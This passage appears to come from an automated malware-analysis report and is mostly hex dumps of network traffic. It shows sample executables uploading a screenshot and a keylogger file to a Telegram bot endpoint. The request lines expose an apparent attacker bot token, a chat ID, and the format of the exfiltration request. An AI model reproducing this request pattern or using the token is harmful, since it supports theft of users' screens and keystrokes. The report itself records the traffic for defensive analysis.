                                                                                      2024-11-27 19:47:17 UTC16355OUTData Raw: 00 1e 11 00 1e 11 00 1e 11 00 1e 11 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f
                                                                                      Data Ascii:
                                                                                      2024-11-27 19:47:17 UTC16355OUTData Raw: 0b 01 ff ff ff 1b 0b 00 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 00 1b 0b 00 1b 0b 00 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 00 1b 0b 00 1b 0a 01 1b 0a 00 1b 0b 01 1b 0b 01 1b 0a 01 76 6c 67 1b 0a 01 1b 0b 01 1b 0b 01 1b 0b 01 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 24 1a 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 c2 c2 c2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
                                                                                      Data Ascii: vlg$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
                                                                                      2024-11-27 19:47:17 UTC16355OUTData Raw: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
                                                                                      Data Ascii:
                                                                                      2024-11-27 19:47:17 UTC16355OUTData Raw: 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 14 00 21 14 00 21 15 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14
                                                                                      Data Ascii: !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
                                                                                      2024-11-27 19:47:17 UTC16355OUTData Raw: 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1d 0f 00 1d 0f 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d
                                                                                      Data Ascii:
                                                                                      2024-11-27 19:47:17 UTC232OUTData Raw: 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 c2 c2 c2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
                                                                                      Data Ascii: $$$$$$$$$$$$$$$$$$$$$$$$$$$$
                                                                                      2024-11-27 19:47:17 UTC16355OUTData Raw: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
                                                                                      Data Ascii:
                                                                                      2024-11-27 19:47:41 UTC388INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0
                                                                                      Date: Wed, 27 Nov 2024 19:47:41 GMT
                                                                                      Content-Type: application/json
                                                                                      Content-Length: 552
                                                                                      Connection: close
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      6192.168.2.549799149.154.167.2204434676C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-11-27 19:47:18 UTC559OUTPOST /bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-SC:::user-PC\user\8.46.123.228 HTTP/1.1
                                                                                      Accept: */*
                                                                                      Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113
                                                                                      Accept-Language: en-ch
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                      Host: api.telegram.org
                                                                                      Content-Length: 3932422
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                      2024-11-27 19:47:18 UTC16355OUTData Raw: 2d 2d 33 66 62 64 30 34 66 35 2d 62 31 65 64 2d 34 30 36 30 2d 39 39 62 39 2d 66 63 61 37 66 66 35 39 63 31 31 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 63 72 65 65 6e 73 68 6f 74 4a 66 76 5a 74 54 46 6f 2e 42 4d 50 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 42 4d 36 00 3c 00 00 00 00 00 36 00 00 00 28 00 00 00 00 05 00 00 00 04 00 00 01 00 18 00 00 00 00 00 00 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 24 1a 00 24 1a 00 23 1a 00 23 1a 00 23 1a 00 23 1a 00 23 1a 00 23 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a
                                                                                      Data Ascii: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113Content-Disposition: form-data; name="document"; filename="ScreenshotJfvZtTFo.BMP"Content-Type: application/octet-streamBM6<6(<$$######$$$$
                                                                                      2024-11-27 19:47:18 UTC16355OUTData Raw: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
                                                                                      Data Ascii:
                                                                                      2024-11-27 19:47:18 UTC16355OUTData Raw: 22 16 00 22 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 19 01 24 24 03 2d 46 0c 35 68 15 3b 81 1b 3e 8c 1e 19 aa b2 09 a5 d9 10 84 a9 17 51 59 1f 23 13 21 18 03 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00
                                                                                      Data Ascii: ""!!!!!!!!!!!!!!!!$$-F5h;>QY#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
                                                                                      2024-11-27 19:47:18 UTC16355OUTData Raw: 00 1e 11 00 1e 11 00 1e 11 00 1e 11 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f
                                                                                      Data Ascii:
                                                                                      2024-11-27 19:47:18 UTC16355OUTData Raw: 0b 01 ff ff ff 1b 0b 00 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 00 1b 0b 00 1b 0b 00 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 00 1b 0b 00 1b 0a 01 1b 0a 00 1b 0b 01 1b 0b 01 1b 0a 01 76 6c 67 1b 0a 01 1b 0b 01 1b 0b 01 1b 0b 01 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 24 1a 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 c2 c2 c2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
                                                                                      Data Ascii: vlg$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
                                                                                      2024-11-27 19:47:18 UTC16355OUTData Raw: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
                                                                                      Data Ascii:
                                                                                      2024-11-27 19:47:18 UTC16355OUTData Raw: 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 14 00 21 14 00 21 15 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14
                                                                                      Data Ascii: !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
                                                                                      2024-11-27 19:47:18 UTC16355OUTData Raw: 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1d 0f 00 1d 0f 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d
                                                                                      Data Ascii:
                                                                                      2024-11-27 19:47:18 UTC232OUTData Raw: 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 c2 c2 c2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
                                                                                      Data Ascii: $$$$$$$$$$$$$$$$$$$$$$$$$$$$
                                                                                      2024-11-27 19:47:18 UTC16355OUTData Raw: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
                                                                                      Data Ascii:
                                                                                      2024-11-27 19:47:50 UTC388INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0
                                                                                      Date: Wed, 27 Nov 2024 19:47:50 GMT
                                                                                      Content-Type: application/json
                                                                                      Content-Length: 552
                                                                                      Connection: close
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      7192.168.2.549802149.154.167.2204434848C:\Users\user\AppData\Roaming\XgbXowhljC.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-11-27 19:47:48 UTC556OUTPOST /bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-KL:::user-PC\user\8.46.123.228 HTTP/1.1
                                                                                      Accept: */*
                                                                                      Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113
                                                                                      Accept-Language: en-ch
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                      Host: api.telegram.org
                                                                                      Content-Length: 2449
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                      2024-11-27 19:47:48 UTC2449OUTData Raw: 2d 2d 33 66 62 64 30 34 66 35 2d 62 31 65 64 2d 34 30 36 30 2d 39 39 62 39 2d 66 63 61 37 66 66 35 39 63 31 31 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4b 65 79 44 61 74 61 77 49 4d 4b 59 4a 64 4e 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 0d 0a 5b 31 34 3a 34 37 3a 30 34 5d 3c 3c 50 72 6f 67 72 61 6d 20 4d 61 6e 61 67 65 72 3e 3e 0d 0a 0d 0a 5b 31 34 3a 34 37 3a 30 34 5d 3c 3c 50 72 6f 67 72 61 6d 20 4d 61 6e 61 67 65 72 3e 3e 0d 0a 0d 0a 5b 31 34 3a 34 37 3a 30 34 5d 3c 3c 50 72 6f 67 72 61 6d 20 4d 61 6e 61
                                                                                      Data Ascii: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113Content-Disposition: form-data; name="document"; filename="KeyDatawIMKYJdN.txt"Content-Type: application/octet-stream[14:47:04]<<Program Manager>>[14:47:04]<<Program Manager>>[14:47:04]<<Program Mana
                                                                                      2024-11-27 19:47:50 UTC388INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0
                                                                                      Date: Wed, 27 Nov 2024 19:47:50 GMT
                                                                                      Content-Type: application/json
                                                                                      Content-Length: 547
                                                                                      Connection: close
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
